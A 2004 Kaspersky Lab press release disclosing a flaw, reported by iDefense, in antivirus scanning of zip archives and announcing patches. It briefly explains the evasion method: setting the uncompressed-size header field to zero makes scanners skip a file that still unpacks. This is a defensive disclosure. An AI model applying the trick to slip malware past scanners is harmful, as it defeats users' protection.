Kaspersky Lab eliminates vulnerability in antivirus scanning of archived files
22 Oct 2004
iDefense, a company specializing in releasing security intelligence detailing potential cyber threats and security issues, has identified a vulnerability in the products of several antivirus vendors, including McAfee, Computer Associates, Kaspersky Lab, Sophos, Eset and RAV.
Kaspersky Lab confirms that the vulnerability does exist. The vulnerability is an exceptional condition in the parsing of zip format files. It could potentially be exploited remotely, allowed hackers to evade virus detection and thus bypass security protection.
The .zip file format stores information about compressed files in two locations (local/ global header). These headers include data about the real size of the uncompressed file. If the real file size variable is changed to O, the antivirus scanner will fail to scan the file, believing it to be too small to contain any potential threat. However, changing the file size variable will not affect the functionality of the archiver - files will still be correctly unpacked.
'We are grateful to iDefense for bringing this vulnerability to our attention. Although it does theoretically represent a security risk, we haven't detected any attempts to exploit this vulnerability. Our weekly update patches the vulnerability in versions 3.x and 4.x, and a patch for version 5.x will be released in the near future, eliminating the incompatibility between the antivirus scanner and the .zip archiver,' said Eugene Kaspersky, the company's Head of Anti-Virus Research.